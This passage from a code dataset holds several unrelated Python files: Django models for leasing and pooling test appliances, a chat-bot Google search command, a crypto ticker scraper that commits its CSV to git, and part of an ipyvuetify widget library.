appliance_pool = models.ForeignKey(\"AppliancePool\", null=True,\n help_text=\"Which appliance pool this appliance belongs to.\")\n name = models.CharField(max_length=64, help_text=\"Appliance's name as it is in the provider.\")\n ip_address = models.CharField(max_length=45, null=True, help_text=\"Appliance's IP address\")\n\n datetime_leased = models.DateTimeField(null=True, help_text=\"When the appliance was leased\")\n leased_until = models.DateTimeField(null=True, help_text=\"When does the appliance lease expire\")\n\n status = models.TextField(default=\"Appliance inserted into the system.\")\n status_changed = models.DateTimeField(auto_now_add=True)\n power_state_changed = models.DateTimeField(default=timezone.now)\n\n marked_for_deletion = models.BooleanField(default=False,\n help_text=\"Appliance is already being deleted.\")\n\n power_state = models.CharField(max_length=32, default=\"unknown\",\n help_text=\"Appliance's power state\")\n ready = models.BooleanField(default=False,\n help_text=\"Appliance has an IP address and web UI is online.\")\n uuid = models.CharField(max_length=36, null=True, blank=True, help_text=\"UUID of the machine\")\n description = models.TextField(blank=True)\n lun_disk_connected = models.BooleanField(\n default=False,\n help_text=\"Whether the Direct LUN disk is connected. (RHEV Only)\")\n\n @property\n def serialized(self):\n return dict(\n id=self.id,\n ready=self.ready,\n name=self.name,\n ip_address=self.ip_address,\n status=self.status,\n power_state=self.power_state,\n status_changed=apply_if_not_none(self.status_changed, \"isoformat\"),\n datetime_leased=apply_if_not_none(self.datetime_leased, \"isoformat\"),\n leased_until=apply_if_not_none(self.leased_until, \"isoformat\"),\n template_name=self.template.original_name,\n template_id=self.template.id,\n provider=self.template.provider.id,\n marked_for_deletion=self.marked_for_deletion,\n uuid=self.uuid,\n template_version=self.template.version,\n template_build_date=self.template.date.isoformat(),\n template_group=self.template.template_group.id,\n template_sprout_name=self.template.name,\n preconfigured=self.preconfigured,\n lun_disk_connected=self.lun_disk_connected,\n )\n\n @property\n @contextmanager\n def kill_lock(self):\n with critical_section(\"kill-({})[{}]\".format(self.__class__.__name__, str(self.pk))):\n yield\n\n @property\n def provider_api(self):\n return self.template.provider_api\n\n @property\n def provider_name(self):\n return self.template.provider_name\n\n @property\n def provider(self):\n return self.template.provider\n\n @property\n def preconfigured(self):\n return self.template.preconfigured\n\n @property\n def cfme(self):\n return CFMEAppliance(self.provider_name, self.name)\n\n @property\n def ipapp(self):\n return IPAppliance(self.ip_address)\n\n def set_status(self, status):\n with transaction.atomic():\n appliance = Appliance.objects.get(id=self.id)\n if status != appliance.status:\n appliance.status = status\n appliance.status_changed = timezone.now()\n appliance.save()\n self.logger.info(\"Status changed: {}\".format(status))\n\n def set_power_state(self, power_state):\n if power_state != self.power_state:\n self.logger.info(\"Changed power state to {}\".format(power_state))\n self.power_state = power_state\n self.power_state_changed = timezone.now()\n\n def __unicode__(self):\n return \"{} {} @ {}\".format(self.__class__.__name__, self.name, self.template.provider.id)\n\n @classmethod\n def unassigned(cls):\n return cls.objects.filter(appliance_pool=None, ready=True)\n\n @classmethod\n def give_to_pool(cls, pool, custom_limit=None):\n \"\"\"Give appliances from shepherd to the pool where the maximum count is specified by pool\n or you can specify a custom limit\n \"\"\"\n from appliances.tasks import (\n appliance_power_on, mark_appliance_ready, wait_appliance_ready, appliance_yum_update,\n appliance_reboot)\n limit = custom_limit if custom_limit is not None else pool.total_count\n appliances = []\n with transaction.atomic():\n for template in pool.possible_templates:\n for appliance in cls.unassigned().filter(\n template=template).all()[:limit - len(appliances)]:\n with appliance.kill_lock:\n appliance.appliance_pool = pool\n appliance.save()\n appliance.set_status(\"Given to pool {}\".format(pool.id))\n tasks = [appliance_power_on.si(appliance.id)]\n if pool.yum_update:\n tasks.append(appliance_yum_update.si(appliance.id))\n tasks.append(\n appliance_reboot.si(appliance.id, if_needs_restarting=True))\n if appliance.preconfigured:\n tasks.append(wait_appliance_ready.si(appliance.id))\n else:\n tasks.append(mark_appliance_ready.si(appliance.id))\n chain(*tasks)()\n appliances.append(appliance)\n if len(appliances) == limit:\n break\n return len(appliances)\n\n @classmethod\n def kill(cls, appliance_or_id):\n # Completely delete appliance from provider\n from appliances.tasks import kill_appliance\n if isinstance(appliance_or_id, cls):\n self = Appliance.objects.get(id=appliance_or_id.id)\n else:\n self = Appliance.objects.get(id=appliance_or_id)\n with self.kill_lock:\n with transaction.atomic():\n self = type(self).objects.get(pk=self.pk)\n self.class_logger(self.pk).info(\"Killing\")\n if not self.marked_for_deletion:\n self.marked_for_deletion = True\n self.leased_until = None\n self.save()\n return kill_appliance.delay(self.id)\n\n def delete(self, *args, **kwargs):\n # Intercept delete and lessen the number of appliances in the pool\n # Then if the appliance is still present in the management system, kill it\n self.logger.info(\"Deleting from database\")\n pool = self.appliance_pool\n result = super(Appliance, self).delete(*args, **kwargs)\n do_not_touch = kwargs.pop(\"do_not_touch_ap\", False)\n if pool is not None and not do_not_touch:\n if pool.current_count == 0:\n pool.delete()\n return result\n\n def prolong_lease(self, time=60):\n self.logger.info(\"Prolonging lease by {} minutes from now.\".format(time))\n with transaction.atomic():\n appliance = Appliance.objects.get(id=self.id)\n appliance.leased_until = timezone.now() + timedelta(minutes=time)\n appliance.save()\n\n @property\n def owner(self):\n if self.appliance_pool is None:\n return None\n else:\n return self.appliance_pool.owner\n\n @property\n def expires_in(self):\n \"\"\"Minutes\"\"\"\n if self.leased_until is None:\n return \"never\"\n seconds = (self.leased_until - timezone.now()).total_seconds()\n if seconds <= 0.0:\n return \"Expired!\"\n else:\n return nice_seconds(seconds)\n\n @property\n def can_launch(self):\n return self.power_state in {self.Power.OFF, self.Power.SUSPENDED}\n\n @property\n def can_suspend(self):\n return self.power_state in {self.Power.ON}\n\n @property\n def can_stop(self):\n return self.power_state in {self.Power.ON}\n\n @property\n def version(self):\n if self.template.version is None:\n return \"---\"\n else:\n return self.template.version\n\n @property\n def managed_providers(self):\n return self.metadata.get(\"managed_providers\", [])\n\n @managed_providers.setter\n def managed_providers(self, value):\n with self.edit_metadata as metadata:\n metadata[\"managed_providers\"] = value\n\n @property\n def vnc_link(self):\n try:\n return self.provider.vnc_console_link_for(self)\n except KeyError: # provider does not exist any more\n return None\n\n\nclass AppliancePool(MetadataMixin):\n total_count = models.IntegerField(help_text=\"How many appliances should be in this pool.\")\n group = models.ForeignKey(Group, help_text=\"Group which is used to provision appliances.\")\n provider = models.ForeignKey(\n Provider, help_text=\"If requested, appliances can be on single provider.\", null=True,\n blank=True)\n version = models.CharField(max_length=16, null=True, help_text=\"Appliance version\")\n date = models.DateField(null=True, help_text=\"Appliance date.\")\n owner = models.ForeignKey(User, help_text=\"User who owns the appliance pool\")\n\n preconfigured = models.BooleanField(\n default=True, help_text=\"Whether to provision preconfigured appliances\")\n description = models.TextField(blank=True)\n not_needed_anymore = models.BooleanField(\n default=False, help_text=\"Used for marking the appliance pool as being deleted\")\n finished = models.BooleanField(default=False, help_text=\"Whether fulfillment has been met.\")\n yum_update = models.BooleanField(default=False, help_text=\"Whether to update appliances.\")\n\n @classmethod\n def create(cls, owner, group, version=None, date=None, provider=None, num_appliances=1,\n time_leased=60, preconfigured=True, yum_update=False):\n if owner.has_quotas:\n user_pools_count = cls.objects.filter(owner=owner).count()\n user_vms_count = Appliance.objects.filter(appliance_pool__owner=owner).count()\n if owner.quotas.total_pool_quota is not None:\n if owner.quotas.total_pool_quota <= user_pools_count:\n raise ValueError(\n \"User has too many pools ({} allowed, {} already existing)\".format(\n owner.quotas.total_pool_quota, user_pools_count))\n if owner.quotas.total_vm_quota is not None:\n if owner.quotas.total_vm_quota <= (user_vms_count + num_appliances):\n raise ValueError(\n \"Requested {} appliances, limit is {} and currently user has {}\".format(\n num_appliances, owner.quotas.total_vm_quota, user_vms_count))\n if owner.quotas.per_pool_quota is not None:\n if num_appliances > owner.quotas.per_pool_quota:\n raise ValueError(\"You are limited to {} VMs per pool, requested {}\".format(\n owner.quotas.per_pool_quota, num_appliances))\n from appliances.tasks import request_appliance_pool\n # Retrieve latest possible\n if not version:\n versions = Template.get_versions(\n template_group=group, ready=True, usable=True, preconfigured=preconfigured,\n provider__working=True)\n if versions:\n version = versions[0]\n if not date:\n if version is not None:\n dates = Template.get_dates(template_group=group, version=version, ready=True,\n usable=True, preconfigured=preconfigured, provider__working=True)\n else:\n dates = Template.get_dates(\n template_group=group, ready=True, usable=True, preconfigured=preconfigured,\n provider__working=True)\n if dates:\n date = dates[0]\n if isinstance(group, basestring):\n group = Group.objects.get(id=group)\n if isinstance(provider, basestring):\n provider = Provider.objects.get(id=provider, working=True)\n if not (version or date):\n raise Exception(\n \"Could not find proper combination of group, date, version and a working provider!\")\n req = cls(\n group=group, version=version, date=date, total_count=num_appliances, owner=owner,\n provider=provider, preconfigured=preconfigured, yum_update=yum_update)\n if not req.possible_templates:\n raise Exception(\"No possible templates! (query: {}\".format(str(req.__dict__)))\n req.save()\n cls.class_logger(req.pk).info(\"Created\")\n request_appliance_pool.delay(req.id, time_leased)\n return req\n\n def delete(self, *args, **kwargs):\n self.logger.info(\"Deleting\")\n with transaction.atomic():\n for task in DelayedProvisionTask.objects.filter(pool=self):\n task.delete()\n\n return super(AppliancePool, self).delete(*args, **kwargs)\n\n @property\n def filter_params(self):\n filter_params = {\n \"template_group\": self.group,\n \"preconfigured\": self.preconfigured,\n }\n if self.version is not None:\n filter_params[\"version\"] = self.version\n if self.date is not None:\n filter_params[\"date\"] = self.date\n if self.provider is not None:\n filter_params[\"provider\"] = self.provider\n return filter_params\n\n @property\n def appliance_filter_params(self):\n params = self.filter_params\n result = {}\n for key, value in params.iteritems():\n result[\"template__{}\".format(key)] = value\n return result\n\n @property\n def possible_templates(self):\n return Template.objects.filter(\n ready=True, exists=True, usable=True,\n **self.filter_params).all()\n\n @property\n def possible_provisioning_templates(self):\n return sorted(\n filter(lambda tpl: tpl.provider.free, self.possible_templates),\n # Sort by date and load to pick the best match (least loaded provider)\n key=lambda tpl: (tpl.date, 1.0 - tpl.provider.appliance_load), reverse=True)\n\n @property\n def possible_providers(self):\n \"\"\"Which providers contain a template that could be used for provisioning?.\"\"\"\n return set(tpl.provider for tpl in self.possible_templates)\n\n @property\n def appliances(self):\n return Appliance.objects.filter(appliance_pool=self).order_by(\"id\").all()\n\n @property\n def current_count(self):\n return len(self.appliances)\n\n @property\n def percent_finished(self):\n if self.total_count is None:\n return 0.0\n total = 4 * self.total_count\n if total == 0:\n return 1.0\n finished = 0\n for appliance in self.appliances:\n if appliance.power_state not in {Appliance.Power.UNKNOWN, Appliance.Power.ORPHANED}:\n finished += 1\n if appliance.power_state == Appliance.Power.ON:\n finished += 1\n if appliance.ip_address is not None:\n finished += 1\n if appliance.ready:\n finished += 1\n return float(finished) / float(total)\n\n @property\n def appliance_ips(self):\n return [ap.ip_address for ap in filter(lambda a: a.ip_address is not None, self.appliances)]\n\n @property\n def fulfilled(self):\n try:\n return len(self.appliance_ips) == self.total_count\\\n and all(a.ready for a in self.appliances)\n except ObjectDoesNotExist:\n return False\n\n @property\n def queued_provision_tasks(self):\n return DelayedProvisionTask.objects.filter(pool=self).order_by(\"id\")\n\n def prolong_lease(self, time=60):\n self.logger.info(\"Initiated lease prolonging by {} minutes\".format(time))\n for appliance in self.appliances:\n appliance.prolong_lease(time=time)\n\n def kill(self):\n with transaction.atomic():\n p = type(self).objects.get(pk=self.pk)\n p.not_needed_anymore = True\n p.save()\n save_lives = not self.finished\n self.logger.info(\"Killing\")\n if self.appliances:\n for appliance in self.appliances:\n if (\n save_lives and appliance.ready and appliance.leased_until is None\n and appliance.marked_for_deletion is False\n and not appliance.managed_providers):\n with transaction.atomic():\n with appliance.kill_lock:\n appliance.appliance_pool = None\n appliance.datetime_leased = None\n appliance.save()\n self.total_count -= 1\n if self.total_count < 0:\n self.total_count = 0 # Protection against stupidity\n self.save()\n appliance.set_status(\n \"The appliance was taken out of dying pool {}\".format(self.id))\n else:\n Appliance.kill(appliance)\n\n if self.current_count == 0:\n # Pool is empty, no point of keeping it alive.\n # This is needed when deleting a pool that has appliances that can be salvaged.\n # They are not deleted. the .delete() method on appliances takes care that when the\n # last appliance in pool is deleted, it deletes the pool. But since we don't delete\n # in the case of salvaging them, we do have to do it manually here.\n self.delete()\n else:\n # No appliances, so just delete it\n self.delete()\n\n @property\n def possible_other_owners(self):\n \"\"\"Returns a list of User objects that can own this pool instead of original owner\"\"\"\n return type(self.owner).objects.exclude(pk=self.owner.pk).order_by(\"last_name\",\n \"first_name\")\n\n @property\n def num_delayed_provisioning_tasks(self):\n return len(self.queued_provision_tasks)\n\n @property\n def num_provisioning_tasks_before(self):\n tasks = self.queued_provision_tasks\n if len(tasks) == 0:\n return 0\n latest_id = tasks[0].id\n return len(DelayedProvisionTask.objects.filter(id__lt=latest_id))\n\n @property\n def num_possible_provisioning_slots(self):\n providers = set([])\n for template in self.possible_provisioning_templates:\n providers.add(template.provider)\n slots = 0\n for provider in providers:\n slots += provider.remaining_provisioning_slots\n return slots\n\n @property\n def num_possible_appliance_slots(self):\n providers = set([])\n for template in self.possible_templates:\n providers.add(template.provider)\n slots = 0\n for provider in providers:\n slots += provider.remaining_appliance_slots\n return slots\n\n @property\n def num_shepherd_appliances(self):\n return len(Appliance.objects.filter(appliance_pool=None, **self.appliance_filter_params))\n\n def __repr__(self):\n return \"\".format(\n self.id, self.group.id, self.total_count)\n\n def __unicode__(self):\n return \"AppliancePool id: {}, group: {}, total_count: {}\".format(\n self.id, self.group.id, self.total_count)\n\n\nclass MismatchVersionMailer(models.Model):\n provider = models.ForeignKey(Provider)\n template_name = models.CharField(max_length=64)\n supposed_version = models.CharField(max_length=32)\n actual_version = models.CharField(max_length=32)\n sent = models.BooleanField(default=False)\n\n\nclass UserApplianceQuota(models.Model):\n user = models.OneToOneField(User, related_name=\"quotas\")\n per_pool_quota = models.IntegerField(null=True, blank=True)\n total_pool_quota = models.IntegerField(null=True, blank=True)\n total_vm_quota = models.IntegerField(null=True, blank=True)\n","sub_path":"sprout/appliances/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":37456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"207253645","text":"\"\"\"\nGoogle web search.\n\nRun queries on Google and return results.\n\"\"\"\n\nimport requests\n\nfrom kochira import config\nfrom kochira.service import Service, background, Config, coroutine\nfrom kochira.userdata import UserData\n\nservice = Service(__name__, __doc__)\n\n\n@service.config\nclass Config(Config):\n api_key = config.Field(doc=\"Google API key.\")\n cx = config.Field(doc=\"Custom search engine ID.\")\n\n\n@service.command(r\"!g (?P.+?)$\")\n@service.command(r\"(?:search for|google) (?P.+?)\\??$\", mention=True)\n@background\ndef search(ctx, term):\n \"\"\"\n Google.\n\n Search for the given terms on Google.\n \"\"\"\n\n r = requests.get(\n \"https://www.googleapis.com/customsearch/v1\",\n params={\n \"key\": ctx.config.api_key,\n \"cx\": ctx.config.cx,\n \"q\": term\n }\n ).json()\n\n results = r.get(\"items\", [])\n\n if not results:\n ctx.respond(ctx._(\"Couldn't find anything matching \\\"{term}\\\".\").format(term=term))\n return\n\n total = len(results)\n\n ctx.respond(ctx._(\"({num} of {total}) {title}: {url}\").format(\n title=results[0][\"title\"],\n url=results[0][\"link\"],\n num=1,\n total=total\n ))\n\n@service.command(r\"!image (?P.+?)$\")\n@service.command(r\"image(?: for)? (?P.+?)\\??$\", mention=True)\n@background\ndef image(ctx, term):\n \"\"\"\n Image search.\n\n Search for the given terms on Google.\n \"\"\"\n\n r = requests.get(\n \"https://www.googleapis.com/customsearch/v1\",\n params={\n \"key\": ctx.config.api_key,\n \"cx\": ctx.config.cx,\n \"searchType\": \"image\",\n \"q\": term\n }\n ).json()\n\n results = [\n item\n for item in r.get(\"items\", [])\n if item.get(\"link\").startswith(\"http\")\n ]\n\n if not results:\n ctx.respond(ctx._(\"Couldn't find anything matching \\\"{term}\\\".\").format(term=term))\n return\n\n total = len(results)\n\n ctx.respond(ctx._(\"({num} of {total}) {url}\").format(\n url=results[0][\"link\"],\n num=1,\n total=total\n ))\n","sub_path":"kochira/services/web/google.py","file_name":"google.py","file_ext":"py","file_size_in_byte":2078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"157204126","text":"import json, requests\nimport datetime\nimport time\nfrom git import Repo\n\n# Get Load Date\nsysdate = datetime.datetime.fromtimestamp(int(time.time())).strftime('%Y-%m-%d %H:%M:%S')\n\n# All the Files\nfile_ticker = open('/home/gapp/CryptoData/ticker.csv', 'a')\n\n# Get ticker data from coin market cap\napi = 'https://api.coinmarketcap.com/v1/ticker/?limit=0'\nrow_count = 0\nresp = requests.get(url=api)\ndata = json.loads(resp.text)\nfor x in data:\n # Ticker Data\n id = x[\"id\"]\n name = x[\"name\"]\n symbol = x[\"symbol\"]\n rank = int(x[\"rank\"] or 0)\n price = float(x[\"price_usd\"] or 0)\n day_volume = float(x[\"24h_volume_usd\"] or 0)\n market_cap = float(x[\"market_cap_usd\"] or 1)\n available_supply = float(x[\"available_supply\"] or 0)\n total_supply = float(x[\"total_supply\"] or 1)\n max_supply = float(x[\"max_supply\"] or 1)\n p_change_hour = float(x[\"percent_change_1h\"] or 0.0) / 100\n p_change_day = float(x[\"percent_change_24h\"] or 0.0) / 100\n p_change_week = float(x[\"percent_change_7d\"] or 0.0) / 100\n last_updated = datetime.datetime.fromtimestamp(int(x[\"last_updated\"] or time.time())).strftime('%Y-%m-%d %H:%M:%S')\n row_ticker = [id, name, symbol, rank, price, day_volume, market_cap, available_supply, total_supply, max_supply, p_change_hour, p_change_day, p_change_week, last_updated,\n sysdate]\n file_ticker.write(','.join(str(e) for e in row_ticker) + '\\n')\n # Historical Data\nfile_ticker.close()\n# github push\nrepo_dir = '/home/gapp/CryptoData/'\nrepo = Repo(repo_dir)\nfile_list = [\n '/home/gapp/CryptoData/ticker.csv'\n]\ncommit_message = 'Update ticker file'\nrepo.index.add(file_list)\nrepo.index.commit(commit_message)\norigin = repo.remote('origin')\norigin.push()","sub_path":"ticker.py","file_name":"ticker.py","file_ext":"py","file_size_in_byte":1728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"260186481","text":"#!/usr/bin/env python3\nfrom functools import partial\nfrom markdown import markdown\nfrom datetime import datetime\nimport traitlets\nimport os\nfrom pathlib import Path\nfrom glob import glob\n\nimport ipyvuetify as v\nfrom ipywidgets import jslink\n\nfrom sepal_ui.scripts import utils\nfrom sepal_ui.scripts import messages as ms\n\n############################\n## hard coded colors ##\n############################\n\nsepal_main = '#2e7d32'\nsepal_darker = '#005005'\n\n###########################\n## classes ##\n###########################\nclass SepalWidget(v.VuetifyWidget):\n \n def __init__(self, **kwargs):\n \n super().__init__(**kwargs)\n self.viz = True\n \n def toggle_viz(self):\n \"\"\"toogle the visibility of the widget\"\"\"\n if self.viz:\n self.hide()\n else:\n self.show()\n \n return self\n \n def hide(self):\n \"\"\"add the d-none html class to the widget\"\"\"\n if not 'd-none' in str(self.class_):\n self.class_ = str(self.class_).strip() + ' d-none'\n self.viz = False\n \n return self\n \n def show(self):\n \"\"\" remove the d-none html class to the widget\"\"\"\n if 'd-none' in str(self.class_):\n self.class_ = str(self.class_).replace('d-none', '')\n self.viz = True\n \n return self\n\nclass Alert(v.Alert, SepalWidget):\n \"\"\"create an alert widget that can be used to display the process outputs\"\"\"\n \n TYPES = ('info', 'secondary', 'primary', 'error', 'warning', 'success')\n \n def __init__(self, type_=None, **kwargs):\n \n type_ = type_ if (type_ in self.TYPES) else self.TYPES[0]\n \n super().__init__(\n children = [''],\n type = type_,\n text = True,\n class_=\"mt-5\",\n **kwargs\n )\n \n self.hide()\n \n \n def add_msg(self, msg, type_='info'):\n self.show()\n self.type = type_ if (type_ in self.TYPES) else self.TYPES[0]\n self.children = [msg]\n \n return self\n \n def add_live_msg(self, msg, type_='info'):\n \n current_time = datetime.now().strftime(\"%Y/%m/%d, %H:%M:%S\")\n\n self.show()\n self.type = type_ if (type_ in self.TYPES) else self.TYPES[0]\n \n self.children = [\n v.Html(tag='p', children=['[{}]'.format(current_time)]),\n v.Html(tag='p', children=[msg])\n ]\n \n return self\n \n def reset(self):\n self.children = ['']\n self.hide()\n \n return self \n \n def bind(self, widget, obj, variable, msg=None):\n \"\"\" \n bind the variable to the widget and display it in the alert\n \n Args:\n widget (v.XX) : an ipyvuetify input element\n obj : the process_io object\n variable (str) : the name of the member in process_io object\n output_message (str, optionnal) : the output message before the variable display\n \"\"\"\n if not msg: msg = 'The selected variable is: '\n \n def on_change(widget, event, data, obj, variable, output, msg):\n \n setattr(obj, variable, widget.v_model)\n \n msg += str(widget.v_model)\n output.add_msg(msg)\n \n return\n \n widget.on_event('change', partial(\n on_change,\n obj=obj,\n variable=variable, \n output=self, \n msg=msg\n ))\n \n return self\n \n def check_input(self, input_, msg=None):\n \"\"\"\n Check if the inpupt value is initialized. If not return false and display an error message else return True\n \n Args:\n input_ : the input to check\n msg (str, optionnal): the message to display if the input is not set\n \n Returns:\n (bool): check if the value is initialized\n \"\"\"\n if not msg: msg = \"The value has not been initialized\"\n init = True \n \n if input_ == None:\n init = False\n self.add_msg(msg, 'error')\n \n return init\n \n\nclass Btn(v.Btn, SepalWidget):\n \"\"\"\n Creates a process button filled with the provided text\n \n Returns: \n btn (v.Btn) :\n \"\"\"\n \n\n def __init__(self, text='Click', icon=None, **kwargs):\n super().__init__(**kwargs)\n self.color='primary'\n self.v_icon = None\n self.children=[text]\n \n if icon:\n self.set_icon(icon)\n\n def set_icon(self, icon):\n \n if self.v_icon:\n self.v_icon.children = [icon]\n else:\n self.v_icon = v.Icon(left=True, children=[icon])\n self.children = [self.v_icon] + self.children\n \n return self\n \n def toggle_loading(self):\n \"\"\"disable and start loading or reverse\"\"\"\n self.loading = not self.loading\n self.disabled = self.loading\n \n return self\n\nclass AppBar (v.AppBar, SepalWidget):\n \"\"\"create an appBar widget with the provided title using the sepal color framework\"\"\"\n def __init__(self, title='SEPAL module', **kwargs):\n \n self.toggle_button = v.Btn(\n icon = True, \n children=[\n v.Icon(class_=\"white--text\", children=['mdi-dots-vertical'])\n ]\n )\n \n super().__init__(\n color=sepal_main,\n class_=\"white--text\",\n dense=True,\n app = True,\n children = [self.toggle_button, v.ToolbarTitle(children=[title])],\n **kwargs\n )\n \n def setTitle(self, title):\n \"\"\"set the title in the appbar\"\"\"\n \n self.children = [\n self.toolBarButton, \n v.ToolbarTitle(children=[title])\n ]\n \n return self\n \nclass DrawerItem(v.ListItem, SepalWidget):\n \"\"\"create a drawer item using the user input\"\"\"\n \n def __init__(self, title, icon=None, card='', href='', **kwargs):\n \n icon = icon if icon else 'mdi-folder-outline'\n \n children = [\n v.ListItemAction(\n children=[\n v.Icon(\n class_=\"white--text\", \n children=[icon])\n ]\n ),\n v.ListItemContent(\n children=[\n v.ListItemTitle(\n class_=\"white--text\", \n children=[title]\n )\n ]\n )\n ]\n \n super().__init__(\n link=True,\n children=children,\n **kwargs) \n \n if not href == '':\n self.href=href\n self.target=\"_blank\"\n \n if not card == '':\n self._metadata = {'card_id': card }\n \n def display_tile(self, tiles):\n \"\"\"\n display the apropriate tiles when the item is clicked\n \n Args:\n tiles ([v.Layout]) : the list of all the available tiles in the app\n \"\"\"\n def on_click(widget, event, data, tiles):\n for tile in tiles:\n if widget._metadata['card_id'] == tile._metadata['mount_id']:\n tile.show()\n else:\n tile.hide()\n \n self.on_event('click', partial(on_click, tiles=tiles))\n \n return self\n \nclass NavDrawer(v.NavigationDrawer, SepalWidget):\n \"\"\" \n create a navdrawer using the different items of the user and the sepal color framework. The drawer can include links to the github page of the project for wiki, bugs and repository.\n \"\"\"\n \n def __init__(self, items, code=None, wiki=None, issue=None, **kwargs):\n \n code_link = []\n if code:\n item_code = DrawerItem('Source code', icon='mdi-file-code', href=code)\n code_link.append(item_code)\n if wiki:\n item_wiki = DrawerItem('Wiki', icon='mdi-book-open-page-variant', href=wiki)\n code_link.append(item_wiki)\n if issue:\n item_bug = DrawerItem('Bug report', icon='mdi-bug', href=issue)\n code_link.append(item_bug)\n \n super().__init__(\n v_model=True,\n app=True,\n color = sepal_darker,\n children = [\n v.List(dense=True, children=items),\n v.Divider(),\n v.List(dense=True, children=code_link)\n ],\n **kwargs\n )\n \n def display_drawer(self, toggleButton):\n \"\"\"\n bind the drawer to it's toggleButton\n\n Args:\n drawer (v.navigationDrawer) : the drawer tobe displayed\n toggleButton(v.Btn) : the button that activate the drawer\n \"\"\"\n def on_click(widget, event, data, drawer):\n drawer.v_model = not drawer.v_model\n \n toggleButton.on_event('click', partial(on_click, drawer=self))\n \n return self\n\nclass Footer(v.Footer, SepalWidget):\n \"\"\"create a footer with cuzomizable text. Not yet capable of displaying logos\"\"\"\n def __init__(self, text=\"\", **kwargs):\n \n text = text if text != '' else 'SEPAL \\u00A9 {}'.format(datetime.today().year)\n \n super().__init__(\n color = sepal_main,\n class_ = \"white--text\",\n app=True,\n children = [text],\n **kwargs\n )\n \nclass App(v.App, SepalWidget):\n \"\"\"Create an app display with the tiles created by the user. Display false footer and appBar if not filled. navdrawer is fully optionnal\n \"\"\"\n \n def __init__(self, tiles=[''], appBar=None, footer=None, navDrawer=None, **kwargs):\n \n self.tiles = None if tiles == [''] else tiles\n \n app_children = []\n \n #add the navDrawer if existing\n if navDrawer:\n app_children.append(navDrawer)\n \n #create a false appBar if necessary\n if not appBar:\n appBar = AppBar()\n app_children.append(appBar)\n\n #add the content of the app\n content = v.Content(children=[\n v.Container(fluid=True,children = tiles)\n ])\n app_children.append(content)\n \n #create a false footer if necessary\n if not footer:\n footer = Footer()\n app_children.append(footer)\n \n super().__init__(\n v_model=None,\n children = app_children,\n **kwargs)\n \n def show_tile(self, name):\n \"\"\"select the tile to display using its mount-id\"\"\"\n for tile in self.tiles:\n if name == tile._metadata['mount_id']:\n tile.show()\n else:\n tile.hide()\n \n return self\n \n \nclass Tile(v.Layout, SepalWidget):\n \"\"\"create a customizable tile for the sepal UI framework\"\"\"\n \n def __init__(self, id_, title, inputs=[''], btn=None, output=None, **kwargs):\n \n if btn:\n inputs.append(btn)\n \n if output:\n inputs.append(output)\n \n title = v.Html(xs12=True, tag='h2', children=[title])\n content = [v.Flex(xs12=True, children=[widget]) for widget in inputs]\n \n card = v.Card(\n class_ = \"pa-5\",\n raised = True,\n xs12 = True,\n children = [title] + content\n )\n \n super().__init__(\n _metadata={'mount_id': id_},\n row=True,\n align_center=True,\n class_=\"ma-5 d-inline\",\n xs12=True,\n children = [card],\n **kwargs\n )\n \n def set_content(self, content):\n \n self.children[0].children = [self.children[0].children[0]] + content\n \n return self \n \n def set_title(self, title):\n \n title = v.Html(xs12=True, tag='h2', children=[title])\n \n self.children[0].children = [title] + self.children[0].children[1:]\n \n return self\n \n def hide(self):\n \"\"\"hide the widget\"\"\"\n \n super().hide()\n \n if 'd-inline' in str(self.class_):\n self.class_ = self.class_.replace('d-inline','')\n \n return self\n \n def show(self):\n \"\"\" remove the d-none html class to the widget\"\"\"\n \n super().show()\n \n if not 'd-inline' in str(self.class_):\n self.class_ = str(self.class_).strip() + ' d-inline'\n \n return self\n \n def toggle_inputs(self, fields_2_show, fields):\n \"\"\"\n display only the widgets that are part of the input_list. the widget_list is the list of all the widgets of the tile.\n \n Args:\n fields_2_show ([v.widget]) : the list of input to be display\n fields ([v.widget]) : the list of the tile widget\n \"\"\"\n \n for field in fields:\n if field in fields_2_show: \n if 'd-none' in str(field.class_):\n field.class_ = field.class_.replace('d-none', '')\n else:\n if not 'd-none' in str(field.class_):\n field.class_ = str(field.class_).strip() + ' d-none'\n \n\n return self\n \nclass TileAbout(Tile):\n \"\"\"\n create a about tile using a md file. This tile will have the \"about_widget\" id and \"About\" title.\"\"\"\n \n def __init__(self, pathname, **kwargs):\n \n #read the content and transform it into a html\n f = open(pathname, 'r')\n if f.mode == 'r':\n about = f.read()\n else :\n about = '**No About File**'\n \n about = markdown(about, extensions=['fenced_code','sane_lists'])\n \n #need to be nested in a div to be displayed\n about = '
\\n' + about + '\\n
'\n \n #create a Html widget\n class MyHTML(v.VuetifyTemplate):\n template = traitlets.Unicode(about).tag(sync=True)\n \n \n content = MyHTML()\n \n super().__init__('about_widget', 'About', inputs=[content], **kwargs)\n \nclass TileDisclaimer(Tile):\n \"\"\"\n create a about tile using a md file. This tile will have the \"about_widget\" id and \"About\" title.\"\"\"\n \n def __init__(self, **kwargs):\n \n pathname = os.path.join(os.path.dirname(__file__), 'scripts', 'disclaimer.md')\n \n #read the content and transform it into a html\n f = open(pathname, 'r')\n if f.mode == 'r':\n about = f.read()\n else :\n about = '**No Disclaimer File**'\n \n about = markdown(about, extensions=['fenced_code','sane_lists'])\n \n #need to be nested in a div to be displayed\n about = '
\\n' + about + '\\n
'\n \n #create a Html widget\n class MyHTML(v.VuetifyTemplate):\n template = traitlets.Unicode(about).tag(sync=True)\n \n \n content = MyHTML()\n \n super().__init__('about_widget', 'Disclaimer', inputs=[content], **kwargs)\n\n \nclass DownloadBtn(v.Btn, SepalWidget):\n \"\"\"Create a green downloading button with the user text\"\"\"\n \n def __init__(self, text, path='#', **kwargs):\n \n #create the url\n if utils.is_absolute(path):\n url = path\n else: \n url = utils.create_download_link(path)\n \n super().__init__(\n class_='ma-2',\n xs5=True,\n color='success',\n href=url,\n children=[\n v.Icon(left=True, children=['mdi-download']),\n text\n ],\n **kwargs\n )\n \nclass DatePicker(v.Layout, SepalWidget):\n \n def __init__(self, label=\"Date\", **kwargs):\n \n date_picker = v.DatePicker(\n no_title=True, \n v_model=None, \n scrollable=True\n )\n\n date_text = v.TextField(\n v_model=None,\n label=label,\n hint=\"YYYY-MM-DD format\",\n persistent_hint=True, \n prepend_icon=\"event\",\n readonly=True,\n v_on='menuData.on'\n )\n\n menu = v.Menu(\n 